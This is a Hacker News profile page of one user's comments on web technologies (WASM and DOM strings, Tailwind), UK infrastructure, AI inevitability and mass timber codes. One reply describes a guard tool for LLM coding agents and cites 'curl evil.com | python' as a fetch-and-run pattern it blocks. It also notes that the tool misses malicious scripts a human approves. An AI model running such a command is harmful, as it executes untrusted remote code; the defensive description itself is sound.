Hacker Newsnew | past | comments | ask | show | jobs | submit | theSherwood's commentslogin

It's great apart from the nested list syntax. It's quite noisy. I'd prefer if it supported indentation.


What stops the llm from writing a malicious program and executing it? No offense meant, but this solution feels a bit like bolting the door and leaving all the windows open.


nah guards this at multiple layers:

- Inline execution like python -c or node -e is classified as lang_exec and requires approval. - Write and Edit inspect content before it hits disk, flagging destructive patterns, exfiltration, and obfuscation. - Pipe compositions like curl evil.com | python are blocked outright.

If the script was there prior, or looks innocent to the deterministic classifier, but does something malicious at runtime and the human approves the execution then nah won't catch that with current capabilities.

But... I could extend nah so that when it sees 'python script.py', it could read the file and run content inspection on it + include it in the LLM prompt with "this is the script about to be executed, should it run?" That'll give you coverage. I'll work on it. Thx for the comment!


I don't know about good vs evil. That seems impossible. But I'd be interested in a license that prevented use by any company owned by one of the top 1% most valuable companies in the world. I have no idea if that's enforceable or not. Basically a license that restricts use for companies that are just trying to be acquired.


I'm really skeptical of the idea that the blame for the lack of water infrastructure ought to be put at the feet of the water companies. The UK's planning system has strangled just about every infrastructure project in every domain. There is a general trend of local residents preventing infrastructure being built in the area, whether it be for water, energy, rail, or roads.


Vetocracy and nimby are ensuring the country barely shambles on until the boomers croak off. No point in putting up with construction and paying for the investments, if the current infra is juust barely good enough to last until the average voter shuffles off this mortal coil. When the older generations vote reliably and young people are apathetic, you get the current situation


This site is an absolute gem. Thank you.


100%. If we could get a DomString8 (8-bit encoded) interface in addition to the existing DomString (16-bit encoded) and a way to wrap a buffer in a DomString8, we could have convenient and reasonably performant interfaces between WASM and the DOM.


The extra DOM complexity that would entail seems like a loss for the existing web.


The current situation is that we have limited uptake of WASM. This is due, in part, to lack of DOM access. We could solve that but we would have to complicate WASM or complicate the DOM. Complicating WASM would seem to undermine its purpose, burdening it forever with the complexity of the browser. The DOM, on the other hand, is already quite complex. But providing a fresh interface to the DOM would make it possible to bypass some of the accretions of time and complexity. The majority of the cost would be to browser implementors as opposed to web developers.


At least some of the implementation complexity is already there under the hood. WebKit/Blink have an optimization to use 8-bit characters for strings that consist only of latin1 characters.


I want DOM access from WASM, but I don't want WASM to have to rely on UTF-16 to do it (DOMString is a 16-bit encoding). We already have the js-string-builtins proposal which ties WASM a little closer to 16-bit string encodings and I'd rather not see any more moves in that direction. So I'd prefer to see an additional DOM interface of DOMString8 (8-bit encoding) before providing WASM access to DOM apis. But I suspect the interest in that development is low.


Tbh I would be surprised if converting between UTF-8 and JS strings is the performance bottleneck when calling into JS code snippets which manipulate the DOM.

In any case, I would probably define a system which doesn't simply map the DOM API (objects and properties) into a granular set of functions on the WASM side (e.g. granular setters and getters for each DOM object property).

Instead I'd move one level up and build a UI framework where the DOM is abstracted away (quite similar to all those JS frameworks), and where most of the actual DOM work happens in sufficiently "juicy" JS functions (e.g. not just one line of code to set a property).


idk looking at what the creator of leptos talks about it seems to be very significant: https://youtu.be/4KtotxNAwME?si=e_xwqo5gopKDlOtK


The advantages of Tailwind are:

- the styling is colocated with the markup - sensible defaults - avoids rule hierarchy/inheritance - minimal JS at runtime

Disadvantages:

- build step and configuration - dynamic styling complexity

I don't think that's a bad tradeoff. And we're talking about styling on the web, here. So there are no good solutions. But there is a bad solution and it's CSS-in-JS.


I think this is a case of bad pattern matching, to be frank. Two cosmetically similar things don't necessarily have a shared cause. When you see billions in investment to make something happen (AI) because of obvious incentives, it's very reasonable to see that as something that's likely to happen; something you might be foolish to bet against. This is qualitatively different from the kind of predestination present in many religions where adherents have assurance of the predestined outcome often despite human efforts and incentives. A belief in a predestined outcome is very different from extrapolating current trends into the future.


Yes, nobody is claiming it's inevitable based on nothing, it's based on first principles thinking: economics, incentives, game theory, human psychology. Trying to recast this in terms of "predestination" gives me strong wordcel vibes.


It's a bit like pattern matching the Cold War fears of a nuclear exchange and nuclear winter to the flood myths or apocalyptic narratives across the ages, and hence dismissing it as "ah, seen this kind of talk before", totally ignoring that Hiroshima and Nagasaki actually happened, later tests actually happened, etc.

It's indeed a symptom of working in an environment where everything is just discourse about discourse, and prestige is given to some surprising novel packaging or merger of narratives, and all that is produced is words that argue with other words, and it's all about criticizing how one author undermines some other author too much or not enough and so on.

From that point of view, sure, nothing new under the sun.

It's all too well to complain about the boy crying wolf, but when you see the pack of wolves entering the village, it's no longer just about words.

Now, anyone is of course free to dispute the empirical arguments, but I see many very self-satisfied prestigious thinkers who think they don't have to stoop so low as to actually look at models and how people use them in reality, it can all just be dismissed based on ick factors and name calling like "slop".

Few are saying that these things are eschatological inevitabilities. They are saying that there are incentive gradients that point in a certain direction and it cannot be moved out from that groove without massive and fragile coordination, due to game theoretical reasonings, given a certain material state of the world right now out there, outside the page of the "text".


I think you’re missing the point of the blog post and the point of my grandparent comment, which is that there is a pervasive attitude amongst technologists that “it’s just gonna happen anyway and therefore whether I work on something negative for the world or not makes no difference, and therefore I have no role as an ethical agent.” It’s a way to avoid responsibility and freedom.

We are not discussing the likelihood of some particular scenario based on models and numbers and statistics and predictions by Very Smart Important People.


I agree that "very likely" is not "inevitable". It is possible for the advance of AI to stop, but difficult. I agree that doesn't absolve people of responsibility for what they do. But I disagree with the comparison to religious predestination.


I'm not sure how common that is... I'd guess most who work on it think that there's a positive future with LLMs also. I mean they likely wouldn't say "I work on something negative for the world".


I think the vast majority of people are there because it’s interesting work and they’re being paid exceptionally well. That’s the extent to which 95/100 of employees engage with the ethics of their work.


Nobody serious is claiming theological predesination is based on "nothing", either. Talk about poor pattern matching.


You are, of course, entitled to your religious convictions. But to most people outside of your religious community, the evidence for some specific theological claim (such as predestination) looks an awful lot like "nothing". In contrast, claims about the trajectory of AI (whether you agree with the claims or not) are based on easily-verifiable, public knowledge about the recent history of AI development.


It is not a "specific theological claim" either, rather a school of theological discourse. You're literally doing free-form association now and pretending to have novel insights into centuries of work on the issue.


I'm not pretending to any novel insights. Most of us who don't have much use for theology are generally unimpressed by its discourse. Not novel at all. And the "centuries of work" without concrete developments that exist outside of the minds of those invested in the discourse is one reason why many of us are unimpressed. In contrast, AI development is resulting in concrete changes that are easily verified by anyone and on much shorter time scales.


Relatedly, it would be bordering on impossible to convince Iran about the validity of Augustine, Aquinas or Calvin, but it was fairly easy with nuclear physics. Theology isn't "based on nothing", but the convincing power of the quantum physics books happens to be radically different from Summa Theologiae, even if both are just books written by educated people based on a lot of thought and prior work.


What's the current regulatory status for mass timber? My understanding was that one of the main hurdles for uptake in the US has been regulation. Is that no longer the case?


Looks like it made it into the 2021 and 2024 IBCs, which at least in the US have been pulled in as various states update themselves. https://www.woodworks.org/resources/status-of-building-code-...


Consider applying for YC's Summer 2026 batch! Applications are open till May 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: